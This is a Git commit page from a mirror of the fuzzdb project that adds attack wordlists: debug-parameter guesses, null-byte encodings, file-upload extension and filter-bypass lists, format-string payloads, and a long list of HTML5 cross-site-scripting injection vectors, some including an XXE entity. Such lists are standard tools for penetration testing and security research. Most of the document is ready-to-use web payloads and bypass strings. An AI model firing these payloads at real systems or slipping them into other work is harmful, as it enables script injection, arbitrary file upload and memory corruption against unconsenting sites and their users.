Mirrors/fuzzdb
2
0
Fork 0
mirror of https://github.com/fuzzdb-project/fuzzdb.git synced 2024-11-10 05:24:12 +00:00
Code Issues Projects Releases Packages Wiki Activity

Fix #144

Browse source
This commit is contained in:
Ricardo Madriz 2016-05-25 17:56:24 -06:00
parent f7aa901576
commit 2863f7a588
150 changed files with 133977 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

40
attack/business-logic/CommonDebugParamNames.txt Normal file
View file

@ -0,0 +1,40 @@
7357=1
7357=true
7357=y
7357=yes
access=1
access=true
access=y
access=yes
adm=1
adm1n=1
adm1n=true
adm1n=y
adm1n=yes
admin=1
admin=true
admin=y
admin=yes
adm=true
adm=y
adm=yes
dbg=1
dbg=true
dbg=y
dbg=yes
debug=1
debug=true
debug=y
debug=yes
edit=1
edit=true
edit=y
edit=yes
grant=1
grant=true
grant=y
grant=yes
test=1
test=true
test=y
test=yes

40
attack/business-logic/CommonMethodNames.txt Normal file
View file

@ -0,0 +1,40 @@
get
put
send
delete
remove
create
add
move
show
list
query
search
view
open
show
download
edit
change
alter
modify
test
update
save
load
close
make
upload
rename
reset
cancel
admin
demo
verify
vrfy
on
off
0
1
enable
disable

30
attack/control-chars/NullByteRepresentations.txt Normal file
View file

@ -0,0 +1,30 @@
%00
\x00
\x00\
\u0000
\u0000
\0
\0\
\00
\00\
\000
\000\
\z
\z\
NUL
NULL
0x00
%00%00
\x00\x00
\x00\x00\
\u0000\u0000
\u0000\u0000\
\0\0
\0\0\
%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00
%C0%80
%E0%80%80
%F0%80%80%80
%F8%80%80%80%80
%FC%80%80%80%80%80
%FE%80%80%80%80%80%80

10
attack/disclosure-directory/directory-indexing-generic.txt Normal file
View file

@ -0,0 +1,10 @@
/%3f.jsp
/?M=D
/?S=D
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
/cgi-bin/test-cgi?/*
/cgi-bin/test-cgi?*
/%00/
/%2e/
/%2f/
/%5c/

30
attack/file-upload/alt-extensions-asp.txt Normal file
View file

@ -0,0 +1,30 @@
asp
aspx
asa
aSP
aSpx
aSa
asp%20%20%20
aspx%20%20%20
asa%20%20%20
aSP%20%20%20
aSpx%20%20%20
aSa%20%20%20
asp......
aspx......
asa......
aSP......
aSpx......
aSa......
asp%20%20%20...%20.%20..
aspx%20%20%20...%20.%20..
asa%20%20%20...%20.%20..
aSP%20%20%20...%20.%20..
aSpx%20%20%20...%20.%20..
aSa%20%20%20...%20.%20..
asp%00
aspx%00
asa%00
aSp%00
aSpx%00
aSa%00

40
attack/file-upload/alt-extensions-coldfusion.txt Normal file
View file

@ -0,0 +1,40 @@
cfm
cfml
cfc
dbm
cFm
cFml
cFc
dBm
cfm%20%20%20
cfml%20%20%20
cfc%20%20%20
dbm%20%20%20
cFm%20%20%20
cFml%20%20%20
cFc%20%20%20
dBm%20%20%20
cfm......
cfml......
cfc.......
dbm......
cFm......
cFml......
cFc......
dBm......
cfm%20%20%20...%20.%20..
cfml%20%20%20...%20.%20..
cfc%20%20%20...%20.%20..
dbm%20%20%20...%20.%20..
cFm%20%20%20...%20.%20..
cFml%20%20%20...%20.%20..
cFc%20%20%20...%20.%20..
dBm%20%20%20...%20.%20..
cfm%00
cfml%00
cfc%00
dbm%00
cFm%00
cFml%00
cFc%00
dBm%00

50
attack/file-upload/alt-extensions-jsp.txt Normal file
View file

@ -0,0 +1,50 @@
jsp
jspx
jsw
jsv
jspf
jSp
jSpx
jSw
jSv
jSpf
jSp%00
jSp%20%20%20
jSp%20%20%20...%20.%20..a
jSp......
jSpf%00
jSpf%20%20%20
jSpf%20%20%20...%20.%20..a
jSpf......
jSpx%00
jSpx%20%20%20
jSpx%20%20%20...%20.%20..a
jSpx......
jSv%00
jSv%20%20%20
jSv%20%20%20...%20.%20..a
jSv......
jSw%00
jSw%20%20%20
jSw%20%20%20...%20.%20..a
jSw......
jsp%00
jsp%20%20%20
jsp%20%20%20...%20.%20..a
jsp......
jspf%00
jspf%20%20%20
jspf%20%20%20...%20.%20..a
jspf......
jspx%00
jspx%20%20%20
jspx%20%20%20...%20.%20..a
jspx......
jsv%00
jsv%20%20%20
jsv%20%20%20...%20.%20..a
jsv......
jsw%00
jsw%20%20%20
jsw%20%20%20...%20.%20..a
jsw......

33
attack/file-upload/alt-extensions-perl.txt Normal file
View file

@ -0,0 +1,33 @@
# .pm .lib cannot be called directly, must be called as modules
pl
pm
cgi
pL
pM
cGi
lib
lIb
cGi%00
cGi%20%20%20
cGi......
cgi%00
cgi%20%20%20
cgi......
lIb%00
lIb%20%20%20
lIb......
lib%00
lib%20%20%20
lib......
pL%00
pL%20%20%20
pL......
pM%00
pM%20%20%20
pM......
pl%00
pl%20%20%20
pl......
pm%00
pm%20%20%20
pm......

60
attack/file-upload/alt-extensions-php.txt Normal file
View file

@ -0,0 +1,60 @@
phtml
php
php3
php4
php5
inc
pHtml
pHp
pHp3
pHp4
pHp5
iNc
iNc%00
iNc%20%20%20
iNc%20%20%20...%20.%20..
iNc......
inc%00
inc%20%20%20
inc%20%20%20...%20.%20..
inc......
pHp%00
pHp%20%20%20
pHp%20%20%20...%20.%20..
pHp......
pHp3%00
pHp3%20%20%20
pHp3%20%20%20...%20.%20..
pHp3......
pHp4%00
pHp4%20%20%20
pHp4%20%20%20...%20.%20..
pHp4......
pHp5%00
pHp5%20%20%20
pHp5%20%20%20...%20.%20..
pHp5......
pHtml%00
pHtml%20%20%20
pHtml%20%20%20...%20.%20..
pHtml......
php%00
php%20%20%20
php%20%20%20...%20.%20..
php......
php3%00
php3%20%20%20
php3%20%20%20...%20.%20..
php3......
php4%00
php4%20%20%20
php4%20%20%20...%20.%20..
php4......
php5%00
php5%20%20%20
php5%20%20%20...%20.%20..
php5......
phtml%00
phtml%20%20%20
phtml%20%20%20...%20.%20..
phtml......

9
attack/file-upload/file-ul-filter-bypass-commonly-writable-directories.txt Normal file
View file

@ -0,0 +1,9 @@
templates_compiled
templates_c
templates
temporary
images
cache
temp
files
tmp

8
attack/file-upload/file-ul-filter-bypass-microsoft-asp-filetype-bf.txt Normal file
View file

@ -0,0 +1,8 @@
{ASPSCRIPT}
{ASPSCRIPT}.{EXT}
{ASPSCRIPT};
{ASPSCRIPT};.{EXT}
{ASPSCRIPT}%00
{ASPSCRIPT}%00.{EXT}
{ASPSCRIPT}::data%00.
{ASPSCRIPT}::data%00.{EXT}

58
attack/file-upload/file-ul-filter-bypass-microsoft-asp.txt Normal file
View file

@ -0,0 +1,58 @@
{ASPSCRIPT}
{ASPSCRIPT};
{ASPSCRIPT};.jpg
{ASPSCRIPT};.pdf
{ASPSCRIPT};.html
{ASPSCRIPT};.htm
{ASPSCRIPT};.txt
{ASPSCRIPT};.xyz
{ASPSCRIPT};.zip
{ASPSCRIPT};.tgz
{ASPSCRIPT};.doc
{ASPSCRIPT};.docx
{ASPSCRIPT};.xls
{ASPSCRIPT};.xlsx
{ASPSCRIPT}%00.jpg
{ASPSCRIPT}%00.pdf
{ASPSCRIPT}%00.html
{ASPSCRIPT}%00.txt
{ASPSCRIPT}%00.xyz
{ASPSCRIPT}%00.tgz
{ASPSCRIPT}%00.zip
{ASPSCRIPT}%00.doc
{ASPSCRIPT}%00.docx
{ASPSCRIPT}%00
{ASPSCRIPT}::data%00.jpg
{ASPSCRIPT}::data%00.pdf
{ASPSCRIPT}::data%00.html
{ASPSCRIPT}::data%00.txt
{ASPSCRIPT}::data%00.zip
{ASPSCRIPT}::data%00.doc
{ASPSCRIPT}::data%00.xls
{ASPSCRIPT}%00%20%20%20
{ASPSCRIPT}%00%20%20%20...%20.%20..
{ASPSCRIPT}%00......
{ASPSCRIPT}%20%20%20
{ASPSCRIPT}%20%20%20...%20.%20..
{ASPSCRIPT}......
{ASPSCRIPT}::data%00%%20%20%20
{ASPSCRIPT}::data%00%%20%20%20...%20.%20..
{ASPSCRIPT}::data%00%......
{ASPSCRIPT}%00%20%20%20;.jpg
{ASPSCRIPT}%00%20%20%20;.doc
{ASPSCRIPT}%00%20%20%20...%20.%20..;.jpg
{ASPSCRIPT}%00%20%20%20...%20.%20..;.doc
{ASPSCRIPT}%00......;.jpg
{ASPSCRIPT}%00......;.doc
{ASPSCRIPT}%20%20%20;.jpg
{ASPSCRIPT}%20%20%20;.doc
{ASPSCRIPT}%20%20%20...%20.%20..;.jpg
{ASPSCRIPT}%20%20%20...%20.%20..;.doc
{ASPSCRIPT}......;.jpg
{ASPSCRIPT}......;.doc
{ASPSCRIPT}::data%00%%20%20%20;.jpg
{ASPSCRIPT}::data%00%%20%20%20;.doc
{ASPSCRIPT}::data%00%%20%20%20...%20.%20..;.jpg
{ASPSCRIPT}::data%00%%20%20%20...%20.%20..;.doc
{ASPSCRIPT}::data%00%......;.jpg
{ASPSCRIPT}::data%00%......;.doc

7
attack/file-upload/file-ul-filter-bypass-ms-php.txt Normal file
View file

@ -0,0 +1,7 @@
{PHPSCRIPT}
{PHPSCRIPT}.phtml
{PHPSCRIPT}.php.html
{PHPSCRIPT}.php::$DATA
{PHPSCRIPT}.php.php.rar
{PHPSCRIPT}.php.rar
{PHPSCRIPT}::$DATA

3
attack/file-upload/file-ul-filter-bypass-x-platform-generic.txt Normal file
View file

@ -0,0 +1,3 @@
%00index.html
;index.html
%00

5
attack/file-upload/file-ul-filter-bypass-x-platform-php.txt Normal file
View file

@ -0,0 +1,5 @@
{PHPSCRIPT}
{PHPSCRIPT}.phtml
{PHPSCRIPT}.php.html
{PHPSCRIPT}.php.php.rar
{PHPSCRIPT}.php.rar

7
attack/file-upload/invalid-filenames-linux.txt Normal file
View file

@ -0,0 +1,7 @@
/
\0
/dev/null
/dev/null/foo
.
..

31
attack/file-upload/invalid-filenames-microsoft.txt Normal file
View file

@ -0,0 +1,31 @@
CON.{EXT}
PRN.{EXT}
AUX.{EXT}
CLOCK$.{EXT}
NUL.{EXT}
COM1.{EXT}
COM2.{EXT}
COM3.{EXT}
COM4.{EXT}
COM5.{EXT}
COM6.{EXT}
COM7.{EXT}
COM8.{EXT}
COM9.{EXT}
LPT1.{EXT}
LPT2.{EXT}
LPT3.{EXT}
LPT4.{EXT}
LPT5.{EXT}
LPT6.{EXT}
LPT7.{EXT}
LPT8.{EXT}
LPT9.{EXT}
*.{EXT}
".{EXT}
[.{EXT}
].{EXT}
:.{EXT}
|.{EXT}
=.{EXT}
,.{EXT}

12
attack/file-upload/invalid-filesystem-chars-microsoft.txt Normal file
View file

@ -0,0 +1,12 @@
*
.
"
/
\
[
]
:
;
|
=
,

3
attack/file-upload/invalid-filesystem-chars-osx.txt Normal file
View file

@ -0,0 +1,3 @@
# list of invalid characters for osx - these can be used to attempt to cause an error condition during file upload bypass attempts which might reveal an absolute path. Useful if you're not sure where your files are landing.
# fuzz these into a filename during upload attempts
:

57
attack/format-strings/format-strings.txt Normal file
View file

@ -0,0 +1,57 @@
%s%p%x%d
%p%p%p%p
%x%x%x%x
%d%d%d%d
%s%s%s%s
%99999999999s
%08x
%20d
%20n
%20x
%20s
%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d
%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i
%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o
%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X
%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a
%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A
%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e
%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E
%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f
%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F
%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g
%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%
XXXXX.%p
XXXXX`perl -e 'print ".%p" x 80'`
`perl -e 'print ".%p" x 80'`%n
%08x.%08x.%08x.%08x.%08x\n
XXX0_%08x.%08x.%08x.%08x.%08x\n
%.16705u%2\$hn
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|
AAAAA%c
AAAAA%d
AAAAA%e
AAAAA%f
AAAAA%I
AAAAA%o
AAAAA%p
AAAAA%s
AAAAA%x
AAAAA%n
ppppp%c
ppppp%d
ppppp%e
ppppp%f
ppppp%I
ppppp%o
ppppp%p
ppppp%s
ppppp%x
ppppp%n
%@
%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@

142
attack/html_js_fuzz/HTML5sec_Injections.txt Normal file
View file

@ -0,0 +1,142 @@
<form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>
<meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi
<meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>
0?<script>Worker("#").onmessage=function(_)eval(_.data)</script> :postMessage(importScripts('data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk'))
<script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script>
<script>({set/**/$($){_/**/setter=$,_=1}}).$=alert</script>
<input onfocus=write(1) autofocus>
<input onblur=write(1) autofocus><input autofocus>
<a style="-o-link:'javascript:alert(1)';-o-link-source:current">X</a>
<video poster=javascript:alert(1)//></video>
<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(1)"></g></svg>
<body onscroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
<x repeat="template" repeat-start="999999">0<y repeat="template" repeat-start="999999">1</y></x>
<input pattern=^((a+.)a)+$ value=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!>
<script>({0:#0=alert/#0#/#0#(0)})</script>
X<x style=`behavior:url(#default#time2)` onbegin=`write(1)` >
<?xml-stylesheet href="javascript:alert(1)"?><root/>
<script xmlns="http://www.w3.org/1999/xhtml">&#x61;l&#x65;rt&#40;1)</script>
<meta charset="x-mac-farsi">¼script ¾alert(1)//¼/script ¾
<script>ReferenceError.prototype.__defineGetter__('name', function(){alert(1)}),x</script>
<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()</script>
<input onblur=focus() autofocus><input>
<form id=test onforminput=alert(1)><input></form><button form=test onformchange=alert(2)>X</button>
1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=alert(1)&gt;`>
<script src="#">{alert(1)}</script>;1
+ADw-html+AD4APA-body+AD4APA-div+AD4-top secret+ADw-/div+AD4APA-/body+AD4APA-/html+AD4-.toXMLString().match(/.*/m),alert(RegExp.input);
<style>p[foo=bar{}*{-o-link:'javascript:alert(1)'}{}*{-o-link-source:current}*{background:red}]{background:green};</style>
1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=alert(1)&gt;>
<link rel=stylesheet href=data:,*%7bx:expression(write(1))%7d
<style>@import "data:,*%7bx:expression(write(1))%7D";</style>
<frameset onload=alert(1)>
<table background="javascript:alert(1)"></table>
<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="alert(1);">XXX</a></a><a href="javascript:alert(2)">XXX</a>
1<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=test.vml#xss></vmlframe>
1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>
<a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">XXX</a>
<!--<img src="--><img src=x onerror=alert(1)//">
<comment><img src="</comment><img src=x onerror=alert(1)//">
<!-- up to Opera 11.52, FF 3.6.28 --><![><img src="]><img src=x onerror=alert(1)//"><!-- IE9+, FF4+, Opera 11.60+, Safari 4.0.4+, GC7+ --><svg><![CDATA[><image xlink:href="]]><img src=xx:x onerror=alert(2)//"></svg>
<style><img src="</style><img src=x onerror=alert(1)//">
<li style=list-style:url() onerror=alert(1)></li><div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)></div>
<head><base href="javascript://"/></head><body><a href="/. /,alert(1)//#">XXX</a></body>
<?xml version="1.0" standalone="no"?><html xmlns="http://www.w3.org/1999/xhtml"><head><style type="text/css">@font-face {font-family: y; src: url("font.svg#x") format("svg");} body {font: 100px "y";}</style></head><body>Hello</body></html>
<style>*[{}@import'test.css?]{color: green;}</style>X
<div style="font-family:'foo[a];color:red;';">XXX</div>
<div style="font-family:foo}color=red;">XXX</div>
<svg xmlns="http://www.w3.org/2000/svg"><script>alert(1)</script></svg>
<SCRIPT FOR=document EVENT=onreadystatechange>alert(1)</SCRIPT>
<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT>
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></embed>
<x style="behavior:url(test.sct)">
<xml id="xss" src="test.htc"></xml><label dataformatas="html" datasrc="#xss" datafld="payload"></label>
<script>[{'a':Object.prototype.__defineSetter__('b',function(){alert(arguments[0])}),'b':['secret']}]</script>
<video><source onerror="alert(1)">
<video onerror="alert(1)"><source></source></video>
<b <script>alert(1)//</script>0</script></b>
<b><script<b></b><alert(1)</script </b></b>
<div id="div1"><input value="``onmouseover=alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>
<div style="[a]color[b]:[c]red">XXX</div>
<div style="\63&#9\06f&#10\0006c&#12\00006F&#13\R:\000072 Ed;color\0\bla:yellow\0\bla;col\0\00 \&#xA0or:blue;">XXX</div>
<!-- IE 6-8 --><x '="foo"><x foo='><img src=x onerror=alert(1)//'><!-- IE 6-9 --><! '="foo"><x foo='><img src=x onerror=alert(2)//'><? '="foo"><x foo='><img src=x onerror=alert(3)//'>
<embed src="javascript:alert(1)"></embed> // O10.10↓, OM10.0↓, GC6↓, FF<img src="javascript:alert(2)"><image src="javascript:alert(2)"> // IE6, O10.10↓, OM10.0↓<script src="javascript:alert(3)"></script> // IE6, O11.01↓, OM10.1↓
<!DOCTYPE x[<!ENTITY x SYSTEM "http://html5sec.org/test.xxe">]><y>&x;</y>
<svg onload="javascript:alert(1)" xmlns="http://www.w3.org/2000/svg"></svg>
<?xml version="1.0"?><?xml-stylesheet type="text/xsl" href="data:,%3Cxsl:transform version='1.0' xmlns:xsl='http://www.w3.org/1999/XSL/Transform' id='xss'%3E%3Cxsl:output method='html'/%3E%3Cxsl:template match='/'%3E%3Cscript%3Ealert(1)%3C/script%3E%3C/xsl:template%3E%3C/xsl:transform%3E"?><root/>
<!DOCTYPE x [ <!ATTLIST img xmlns CDATA "http://www.w3.org/1999/xhtml" src CDATA "xx:x" onerror CDATA "alert(1)" onload CDATA "alert(2)">]><img />
<doc xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:html="http://www.w3.org/1999/xhtml"> <html:style /><x xlink:href="javascript:alert(1)" xlink:type="simple">XXX</x></doc>
<card xmlns="http://www.wapforum.org/2001/wml"><onevent type="ontimer"><go href="javascript:alert(1)"/></onevent><timer value="1"/></card>
<div style=width:1px;filter:glow onfilterchange=alert(1)>x</div>
<// style=x:expression\28write(1)\29>
<form><button formaction="javascript:alert(1)">X</button>
<event-source src="event.php" onload="alert(1)">
<a href="javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A" /></a>
<script<{alert(1)}/></script </>
<?xml-stylesheet type="text/css"?><!DOCTYPE x SYSTEM "test.dtd"><x>&x;</x>
<?xml-stylesheet type="text/css"?><root style="x:expression(write(1))"/>
<?xml-stylesheet type="text/xsl" href="#"?><img xmlns="x-schema:test.xdr"/>
<object allowscriptaccess="always" data="test.swf"></object>
<style>*{x:(write(1))}</style>
<x xmlns:xlink="http://www.w3.org/1999/xlink" xlink:actuate="onLoad" xlink:href="javascript:alert(1)" xlink:type="simple"/>
<?xml-stylesheet type="text/css" href="data:,*%7bx:expression(write(2));%7d"?>
<x:template xmlns:x="http://www.wapforum.org/2001/wml" x:ontimer="$(x:unesc)j$(y:escape)a$(z:noecs)v$(x)a$(y)s$(z)cript$x:alert(1)"><x:timer value="1"/></x:template>
<x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="javascript:alert(1)//#x"/>
<x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="test.evt#x"/>
<body oninput=alert(1)><input autofocus>
<svg xmlns="http://www.w3.org/2000/svg"><a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="javascript:alert(1)"><rect width="1000" height="1000" fill="white"/></a></svg>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><animation xlink:href="javascript:alert(1)"/><animation xlink:href="data:text/xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(1)'%3E%3C/svg%3E"/><image xlink:href="data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(1)'%3E%3C/svg%3E"/><foreignObject xlink:href="javascript:alert(1)"/><foreignObject xlink:href="data:text/xml,%3Cscript xmlns='http://www.w3.org/1999/xhtml'%3Ealert(1)%3C/script%3E"/></svg>
<svg xmlns="http://www.w3.org/2000/svg"><set attributeName="onmouseover" to="alert(1)"/><animate attributeName="onunload" to="alert(1)"/></svg>
<!-- Up to Opera 10.63 --><div style=content:url(test2.svg)></div><!-- Up to Opera 11.64 - see link below --><!-- Up to Opera 12.x --><div style="background:url(test5.svg)">PRESS ENTER</div>
[A]<? foo="><script>alert(1)</script>"><! foo="><script>alert(1)</script>"></ foo="><script>alert(1)</script>">[B]<? foo="><x foo='?><script>alert(1)</script>'>">[C]<! foo="[[[x]]"><x foo="]foo><script>alert(1)</script>">[D]<% foo><x foo="%><script>alert(1)</script>">
<div style="background:url(http://foo.f/f oo/;color:red/*/foo.jpg);">X</div>
<div style="list-style:url(http://foo.f)\20url(javascript:alert(1));">X</div>
<svg xmlns="http://www.w3.org/2000/svg"><handler xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load">alert(1)</handler></svg>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><feImage><set attributeName="xlink:href" to="data:image/svg+xml;charset=utf-8;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjxzY3JpcHQ%2BYWxlcnQoMSk8L3NjcmlwdD48L3N2Zz4NCg%3D%3D"/></feImage></svg>
<iframe src=mhtml:http://html5sec.org/test.html!xss.html></iframe><iframe src=mhtml:http://html5sec.org/test.gif!xss.html></iframe>
<!-- IE 5-9 --><div id=d><x xmlns="><iframe onload=alert(1)"></div><script>d.innerHTML+='';</script><!-- IE 10 in IE5-9 Standards mode --><div id=d><x xmlns='"><iframe onload=alert(2)//'></div><script>d.innerHTML+='';</script>
<div id=d><div style="font-family:'sans\27\2F\2A\22\2A\2F\3B color\3Ared\3B'">X</div></div><script>with(document.getElementById("d"))innerHTML=innerHTML</script>
XXX<style>*{color:gre/**/en !/**/important} /* IE 6-9 Standards mode */<!----><!--*{color:red} /* all UA */*{background:url(xx:x //**/\red/*)} /* IE 6-7 Standards mode */</style>
<img[a][b]src=x[d]onerror[c]=[e]"alert(1)">
<a href="[a]java[b]script[c]:alert(1)">XXX</a>
<img src="x` `<script>alert(1)</script>"` `>
<script>history.pushState(0,0,'/i/am/somewhere_else');</script>
<svg xmlns="http://www.w3.org/2000/svg" id="foo"><x xmlns="http://www.w3.org/2001/xml-events" event="load" observer="foo" handler="data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Chandler%20xml%3Aid%3D%22bar%22%20type%3D%22application%2Fecmascript%22%3E alert(1) %3C%2Fhandler%3E%0A%3C%2Fsvg%3E%0A#bar"/></svg>
<iframe src="data:image/svg-xml,%1F%8B%08%00%00%00%00%00%02%03%B3)N.%CA%2C(Q%A8%C8%CD%C9%2B%B6U%CA())%B0%D2%D7%2F%2F%2F%D7%2B7%D6%CB%2FJ%D77%B4%B4%B4%D4%AF%C8(%C9%CDQ%B2K%CCI-*%D10%D4%B4%D1%87%E8%B2%03"></iframe>
